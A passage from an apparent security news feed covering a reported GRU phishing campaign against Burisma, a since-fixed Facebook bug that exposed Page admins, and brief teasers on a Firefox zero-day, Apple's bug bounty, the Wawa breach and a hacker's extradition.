The attack was detailed by California-based cybersecurity firm Area 1 Security in a report.

“This report details an ongoing Russian government phishing campaign targeting the email credentials of employees at Burisma Holdings and its subsidiaries and partners. The campaign against the Ukrainian oil & gas company was launched by the Main Intelligence Directorate of the General Staff of the Russian Army or GRU.” reads the report published by Area 1 Security. “Phishing for credentials allows cyber actors to gain control of an organization’s internal systems by utilizing trusted access methods (e.g.: valid usernames and passwords) in order to observe or to take further action. Once credentials are phished, attackers are able to operate covertly within an organization in pursuit of their goal.”

In December, President Trump was facing an impeachment trial over his efforts to pressure Ukraine to investigate former Vice President Joseph R. Biden and Burisma’s relationship with its former board member Hunter Biden, the son of Joe Biden.

Russian military cyberspies were gathering information by hacking the Ukrainian gas company.

“The timing of the GRU’s campaign in relation to the 2020 US elections raises the specter that this is an early warning of what we have anticipated since the successful cyberattacks undertaken during the 2016 US elections,” continues the Area 1 report.

It is not clear which information the hackers accessed; experts believe Russian spies were searching for potentially embarrassing material on the rival Biden and his son.

In a July 2019 phone call, Trump asked Ukrainian President Volodymyr Zelensky to investigate the Bidens and Burisma.

Burisma hired Biden’s son while his father was vice president and leading the Obama administration’s Ukraine policy.

“Donald Trump tried to coerce Ukraine into lying about Joe Biden and a major bipartisan, international anti-corruption victory because he recognized that he can’t beat the vice president,” said Andrew Bates, a spokesman for the Biden campaign, as reported by the NYT.

“Now we know that Vladimir Putin also sees Joe Biden as a threat,” Mr. Bates added. “Any American president who had not repeatedly encouraged foreign interventions of this kind would immediately condemn this attack on the sovereignty of our elections.”

The scheme was similar to the one allegedly adopted by Russian intelligence ahead of the presidential election in 2016, when the cyberspies hacked emails from Hillary Clinton’s campaign and used an army of trolls to spread propaganda and misinformation.

According to Area 1’s report, the GRU spies hacked the servers of Burisma Holdings.

In this campaign, the GRU combined several different authenticity techniques to compromise the targeted network, such as domain-based authenticity, business process and application authenticity, and partner and supply chain authenticity.

“Since 2016, the GRU has consistently used an assembly line process to acquire and set up infrastructure for their phishing campaigns. Area 1 Security has correlated this campaign against Burisma Holdings with specific tactics, techniques, and procedures (TTPs) used exclusively by the GRU in phishing for credentials.” continues the report. “Repeatedly, the GRU uses Ititch, NameSilo, and NameCheap for domain registration; MivoCloud and M247 as Internet Service Providers; Yandex for MX record assignment; and a consistent pattern of lookalike domains.”

Trump is expected to stand trial in the Senate as early as this week on two articles of impeachment: abuse of power and obstruction of Congress.

Pierluigi Paganini

(SecurityAffairs – Bronze President, hacking)

The post Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma? appeared first on Security Affairs.

Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info

Facebook addressed last week a security flaw that exposed page admin accounts, the bug was exploited against several high-profile pages.

Last week, Facebook addressed a security issue that exposed Page admin accounts; the bug was exploited in attacks in the wild against several high-profile pages.

The page admin accounts are anonymous unless the Page owner opts to make the admins public, but a bug allowed anyone to reveal the accounts running a Page.

“The accounts behind those pages are anonymous unless a Page owner opts to make the admins public. You can’t see, for example, the names of the people who post to Facebook on WIRED’s behalf. But a bug that was live from Thursday evening until Friday morning allowed anyone to easily reveal the accounts running a Page, essentially doxing anyone who posted to one.” reads a post published by Wired.

The “View edit history” feature in Facebook allows Page admins to view any activity related to pages, including the names of the users who made changes to a post. The bug allowed miscreants to reveal the account of the individual who made the changes, including Page admins, with serious privacy implications.

Wired confirmed that on message boards like 4chan, people started posting screenshots that doxed the accounts behind prominent pages. Exploiting the bug was simple: by opening a target page and checking the edit history of a post, it was possible to view the account or accounts that had made edits to each post.

Facebook quickly addressed the issue after it was alerted by a security researcher.

“We quickly fixed an issue where someone could see who edited or published a post on behalf of a Page when looking at its edit history,” Facebook said in a statement. “We are grateful to the security researcher who alerted us to this issue.”

The list of the pages targeted by hackers included the ones belonging to President Donald Trump, the street artist Banksy, Russian president Vladimir Putin, former US secretary of state Hillary Clinton, Canadian prime minister Justin Trudeau, the hacking collective Anonymous, climate activist Greta Thunberg, and the rapper Snoop Dogg, among others.

In February 2018, the security researcher Mohamed Baset discovered a similar vulnerability on Facebook.

Baset explained that the flaw was a “logical error” that he discovered after receiving an invitation to like a Facebook page on which he had liked a post. The researcher analyzed the source code of the email sent by the social network and discovered that it included the name of the administrator of the page and other info.

Pierluigi Paganini

(SecurityAffairs – Facebook, hacking)

The post Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info appeared first on Security Affairs.

Critical Firefox 0-Day Under Active Attacks – Update Your Browser Now!

Attention! Are you using Firefox as your web browsing software on your Windows, Linux, or Mac systems? If yes, you should immediately update your free and open-source Firefox web browser to the latest version available on Mozilla's website. Why the urgency? Mozilla earlier today released Firefox 72.0.1 and Firefox ESR 68.4.1 versions to patch a critical zero-day vulnerability in its browsing

Apple Opens Its Invite-Only Bug Bounty Program to All Researchers

As promised by Apple in August this year, the company today finally opened its bug bounty program to all security researchers, offering monetary rewards to anyone for reporting vulnerabilities in the iOS, macOS, watchOS, tvOS, iPadOS, and iCloud to the company. Since its launch three years ago, Apple's bug bounty program was open only for selected security researchers based on invitation and

Hackers Stole Customers’ Payment Card Details From Over 700 Wawa Stores

Have you stopped at any Wawa convenience store and used your payment card to buy gas or snacks in the last nine months? If yes, your credit and debit card details may have been stolen by cybercriminals. Wawa, the Philadelphia-based gas and convenience store chain, disclosed a data breach incident that may have exposed payment card information of thousands of customers who used their cards at

British Hacker Accused of Blackmailing healthcare Firms Extradited to U.S.

A British man suspected to be a member of 'The Dark Overlord,' an infamous international hacking group, has finally been extradited to the United States after being held for over two years in the United Kingdom. Nathan Francis Wyatt, 39, appeared in federal court in St. Louis, Missouri, on Wednesday to face charges related to his role in hacking healthcare and accounting companies in the U.S.